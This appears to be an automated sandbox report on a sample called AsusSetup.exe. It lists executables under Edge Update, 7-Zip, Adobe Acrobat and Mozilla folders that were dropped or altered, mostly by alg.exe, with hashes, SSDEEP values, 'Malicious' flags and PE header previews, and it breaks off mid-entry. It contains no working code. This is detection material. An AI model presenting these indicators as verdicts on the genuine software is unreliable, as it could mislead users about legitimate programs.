                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:AIxkTBVR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:pxk1VRLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D6920841EB769314CD9C9E25F9AFECEA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9574C6E669C281313AE451708357A3BA5D22B79B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:426F665CD7AEBFB797ECCF0FA44AC34DBF8C2F99EA71646973BEA514B35AA45B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:61BF353A941AC94BC2F2EE7CF47D82DBEA57320B22445A5B24FC9E148AE5FDF7A198AF39E878FC8FAD9320596A6A2C82D9FDAFBE21A12BE2E6CBAD34C14DA856
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .....Yi......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1490944
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.791243799023212
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:lcssmrM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ibfLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:0C73631BBD43DDD0DBCFF685EDAE4C59
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0C4B8AC0480229625ADCE55B3C2F01D2DA50F4B3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7587DE77FF4F37800571B87378D5989174900C17791A82ABC1139B02171DD253
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C11B36D28DD6219B9B39984059062FD9D26AF3D29BA2F31622A9499E91ADFC8EC76C538C4FFB4A5646347B54513776D6A129AE264B76127529F5F2D7E7479A49
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!........... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1539584
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901305567772658
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a0/cT++foSBWU2Yxhkgr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:R/cK+foQWU2YnPrLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:0E0B43A34957B0444A87F16259F85BE0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9E9456E512C849DB3C6E8FEEDDF519D459B29562
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1B0B425141A0F2664ECCB9247F12295A006486AF18DB1A17D218DD13CD8A4071
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:930536308E8AB0F3FA47AE9013FD411BD0AA0DC9BA1A5AB96E5F286DD34A039818D63DC289E2BA54F4A301F18BB0E099970D80C0008B164A9AE9B9CA6052D4AB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................".....8I.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.662332271796822
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:sbBRzBgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WBRVgLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:A46F6523010FEECE612A8EF08B76C6E8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:89A6E836F85B5C61C56DCD0CDAA8C37A8EE16D18
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1EFF6ECAD030FD562CCDFC3BDD910AC75CD67F9CC794F919F90206EA4E8D216F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:871909D8B0CCBF9FED109B01F25BB20C8137874E99FA45F24A0C5BE18B704D48083A74C310B1E9171437FEBF637586A843575F6CC360FCAF5F3993327262E21F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@........................... ...... ..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.938835751991505
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:/y53w24gQu3TPZ2psFkiSqwozJLNiXicJFFRGNzj3:/yFQgZqsFki+ozJ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5FA5A0556AC12C5E3C0787FC12B96ABB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:79E48CC0ED6A0E35BF8E4139196058569100FC09
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:01656D886E4CCA72F8EF04269B67214E4D193A3C7EBA94D0EC34B0824ED788FD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B93D32D4FF9843BA04CC154B63AC0ED10A1C9C154AB8B587BCD5FD8B8C29E18D7B960375CD8B30AF6F865054E858F05577524CBDAD0C3AD7E1CDFF466C5FF5E9
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.8287906164717675
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:m/Ldx/HY/r/s/CJ/P/kRQaWtG/waWmIG/jW/u/J/8D/H/paWqG/VM/qCaWlbGaWM:WqCRyBmp6tr4Cxq4htniD
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:A1ABF723445B1E61689957F9F1823BB6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0F0B77DC49E78059C2BF6CBD2BE4C975B62BF365
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:143A82372D645C4119FE0037F233F2BC7EF3E647B81E5652B8A41068ABE954FD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:74EFCD329E884226B81C8D011245479C1D11284F8242219E4710EA00028F467B014D71AF1256F28E0264E3FD07714D2A50EF7EECCFCE2DF4B38EA408331AD11C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-28 11:50:01-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-28 11:50:01-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-28 11:50:0

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901612842389403
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:PQVTZu0JY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4VTZupLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8692348A40AAA0C027003BE9DA09E432
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:DCA629572218B83ACA61B85850113AE8CEA44785
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:219678895BCFE1D12193A997DFE4161F9FE65CE0FF21AE6846432CA1C415A4AE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:DF755A9F6E1C040099509082E75E29F56148A291FCD67E98CAFC9FC9380EC64E55CBE6D4764D721BB5B8DD5D165D25D818BAEB183405553B8909B357C6C3FA2C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1839616
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2488737267134535
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:V+gkEHfh4CoD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8gkE/SlLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:353E4B964B509A17DE4188165AAB10CD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5E2B170B9ADA06DEACF70555B0539CAC3451D239
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A599465C28BCB6D2BE2455A0D30666A148DA8166A7126A1FA19834267FA41D70
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:3A482ABFEDF7BB48D4602A6F5BEF00527A0D825DBA4451BA2212C2DC1494A40F527EA1B0AF8AB344D6CA00FF40B2C9CBDCF6E1E162F7651B550C6281EBF779A2
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'........... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.091709292241218
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:sBpDRmi78gkPXlyo0GtjrQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4NRmi78gkPX4o0GtjsLNiXicJFFRGNzb
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3F7927D8C34047A6461E4351DBB2955C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:852CA171AD8CA23AE5BB8EF0535608EAF44DE1B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C1065F9F88312B60FBCBCB3FB6872EE1BCEBFAE4390347B0B129A4163DD6625F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:1FB6F9BFB761015BD36CE3FD15E9AD16531ED76BCAD0F639F9E08C55A8DE98C5A35DFAA2ED0C70BC585D609877A921615C3D2120EFB394E622E506B3B3F47095
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@......................................t.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.222630997089964
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:BLOS2oTPIXVD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:b/TELNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2854140D4D8DA418C17B3297E25BA5D9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:68A766A036D9D684CA1D1133C9A8843CD8D0ADDA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9A4483667F68AA97C23A2EA4CDBA48D4588DA1CFA6B4EE9417AD42FA64D0939B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:5E95675FEB7060D3515338552204D45A31CE0E4CA606D16081AC0DE90E5651F4D180FC3A8A1AFCC5DF2773C181B47309670C59370CF2FBB65DA8B21D42E07AD4
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................v..... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1300992
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.534778720187119
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:AtF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2B97BD1393ED933265C488E51D19E9DB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:BC968AA469A80570819A7B98304E44A86B8D3E1A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D36C7E15879CA2F3936BE3A59B6D2D3D42D94D2B3AD084E568F1875E4813BA90
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:652CCC9DB155517F337818D3DFB121D26D35FC207764C2594D6DF18AB0E7FBE706686DB9A1796F1CB0FD9E822165C49AF7A524216762A8DECA0AB4D76D216F54
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..................................U......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.702475065375768
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:sAdz6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sAdGLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D11D16455E2A9513EEE21191F40371D8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:35F458894101A6C5278CEFF151A15960704D940C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2D55DDE665D0E6FA68BE7919E61AAF47987BAFEB90286A9B51981834B7041AED
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:68252FAAD3D15AEFA38277FF65A7C1CB0638DD6C4DF26684E0972CABB2F4234F1D4B2C7DAFC1C8A63CDD11C8E15E378DB37577F74CE71222222A86B3485C12D0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.......................................... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1613312
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.680237146826291
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:lv0iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3BAE2B233763E924B4C891188E458506
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A5ACFD9C9A5AB9059ACC0CFA4A7256A7BBDCD7CC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:025DDD9549A19B21F2980393315DA988E91F269C3B635C7EF79CF45BA93CAA9E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:D6A20564B554E9B8596D8D4E737C64C066517D13F1A9FACD4C36DDAF52D66ACD8CF7D776F9DA4854A0393C4F048A69C7950A43B5A4DAFCE6D6DDC1AD27938B1A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#.....7..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1616896
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.046918514042736
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:95zhM1XScv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JMsyLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:DC1207167380115BF2C1424BACFDCD18
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0F3048B26FDFAC93987624A89D3B7E58F03764BB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:4A88BB22BDC73A96218FFDE57759DE2109C327A3CC948F28110DD215CF6020CB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FD1461F9645652CC57D36C713067BF88150899CC839743395EAC81C605047B5F6A68D1C73EF5C5F934062BCFBA0B5D4075A90BBDC01AF1E20AB6DD6146D79786
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#........... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
